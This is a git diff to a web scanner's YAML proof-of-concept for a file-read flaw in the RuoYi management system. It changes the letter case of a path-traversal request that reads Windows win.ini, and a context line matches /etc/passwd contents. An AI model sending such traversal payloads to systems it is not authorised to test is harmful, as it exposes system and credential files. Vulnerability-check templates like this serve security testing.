diff --git a/WebScan/pocs/ruoyi-management-fileread.yml b/WebScan/pocs/ruoyi-management-fileread.yml index f052fb0..6debdd1 100644 --- a/WebScan/pocs/ruoyi-management-fileread.yml +++ b/WebScan/pocs/ruoyi-management-fileread.yml @@ -7,7 +7,7 @@ groups: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) windows: - method: GET - path: /Common/download/resource?resource=/profile/../../../../Windows/win.ini + path: /common/download/resource?resource=/profile/../../../../Windows/win.ini expression: | response.status == 200 && response.body.bcontains(b"for 16-bit app support") detail: